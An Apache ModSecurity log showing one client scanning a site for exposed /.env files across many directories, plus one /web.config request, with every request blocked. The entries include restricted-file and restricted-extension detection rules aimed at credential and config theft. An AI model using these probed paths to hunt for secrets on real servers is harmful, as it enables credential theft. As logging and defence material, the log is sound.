[Sat Nov 29 01:24:22.322166 2025] [:error] [pid 396955] [client 3.99.142.85:39728] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSo9NuKnXhOcMLhGvoBleQAAAAc"]
[Sat Nov 29 01:24:22.322468 2025] [:error] [pid 396955] [client 3.99.142.85:39728] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSo9NuKnXhOcMLhGvoBleQAAAAc"]
[Sat Nov 29 01:24:22.322679 2025] [:error] [pid 396955] [client 3.99.142.85:39728] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSo9NuKnXhOcMLhGvoBleQAAAAc"]
[Sat Nov 29 01:24:22.563017 2025] [:error] [pid 396956] [client 3.99.142.85:39854] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSo9NotKufSJfVuSdY3iwwAAAAo"]
[Sat Nov 29 01:24:22.563312 2025] [:error] [pid 396956] [client 3.99.142.85:39854] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSo9NotKufSJfVuSdY3iwwAAAAo"]
[Sat Nov 29 01:24:22.563533 2025] [:error] [pid 396956] [client 3.99.142.85:39854] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSo9NotKufSJfVuSdY3iwwAAAAo"]
[Sat Nov 29 01:24:23.124794 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSo9NzRmtvrSM4WZBRuJ1QAAAAs"]
[Sat Nov 29 01:24:23.125051 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSo9NzRmtvrSM4WZBRuJ1QAAAAs"]
[Sat Nov 29 01:24:23.125248 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSo9NzRmtvrSM4WZBRuJ1QAAAAs"]
[Sat Nov 29 01:24:23.330645 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSo9N7VL27gtiM4DUrnKhwAAAAM"]
[Sat Nov 29 01:24:23.330862 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSo9N7VL27gtiM4DUrnKhwAAAAM"]
[Sat Nov 29 01:24:23.331061 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSo9N7VL27gtiM4DUrnKhwAAAAM"]
[Sat Nov 29 01:24:23.876169 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSo9N1onenFtamV5yHYc3wAAAAI"]
[Sat Nov 29 01:24:23.876395 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSo9N1onenFtamV5yHYc3wAAAAI"]
[Sat Nov 29 01:24:23.876596 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSo9N1onenFtamV5yHYc3wAAAAI"]
[Sat Nov 29 01:24:24.318850 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSo9OLVL27gtiM4DUrnKiAAAAAM"]
[Sat Nov 29 01:24:24.319085 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSo9OLVL27gtiM4DUrnKiAAAAAM"]
[Sat Nov 29 01:24:24.319285 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSo9OLVL27gtiM4DUrnKiAAAAAM"]
[Sat Nov 29 01:24:24.773260 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSo9ODRmtvrSM4WZBRuJ1gAAAAs"]
[Sat Nov 29 01:24:24.773496 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSo9ODRmtvrSM4WZBRuJ1gAAAAs"]
[Sat Nov 29 01:24:24.773701 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSo9ODRmtvrSM4WZBRuJ1gAAAAs"]
[Sat Nov 29 01:24:25.365239 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSo9OVonenFtamV5yHYc4AAAAAI"]
[Sat Nov 29 01:24:25.365463 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSo9OVonenFtamV5yHYc4AAAAAI"]
[Sat Nov 29 01:24:25.365641 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSo9OVonenFtamV5yHYc4AAAAAI"]
[Sat Nov 29 01:24:25.943631 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSo9OTRmtvrSM4WZBRuJ1wAAAAs"]
[Sat Nov 29 01:24:25.943846 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSo9OTRmtvrSM4WZBRuJ1wAAAAs"]
[Sat Nov 29 01:24:25.944048 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSo9OTRmtvrSM4WZBRuJ1wAAAAs"]
[Sat Nov 29 01:24:26.292687 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSo9OlonenFtamV5yHYc4QAAAAI"]
[Sat Nov 29 01:24:26.293006 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSo9OlonenFtamV5yHYc4QAAAAI"]
[Sat Nov 29 01:24:26.293265 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSo9OlonenFtamV5yHYc4QAAAAI"]
[Sat Nov 29 01:24:26.615682 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSo9OrVL27gtiM4DUrnKiQAAAAM"]
[Sat Nov 29 01:24:26.615991 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSo9OrVL27gtiM4DUrnKiQAAAAM"]
[Sat Nov 29 01:24:26.616223 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSo9OrVL27gtiM4DUrnKiQAAAAM"]
[Sat Nov 29 01:24:27.232721 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSo9OzRmtvrSM4WZBRuJ2AAAAAs"]
[Sat Nov 29 01:24:27.232974 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSo9OzRmtvrSM4WZBRuJ2AAAAAs"]
[Sat Nov 29 01:24:27.233189 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSo9OzRmtvrSM4WZBRuJ2AAAAAs"]
[Sat Nov 29 01:24:27.234910 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSo9O7VL27gtiM4DUrnKigAAAAM"]
[Sat Nov 29 01:24:27.235106 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSo9O7VL27gtiM4DUrnKigAAAAM"]
[Sat Nov 29 01:24:27.235266 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSo9O7VL27gtiM4DUrnKigAAAAM"]
[Sat Nov 29 01:24:28.652093 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSo9PFonenFtamV5yHYc4wAAAAI"]
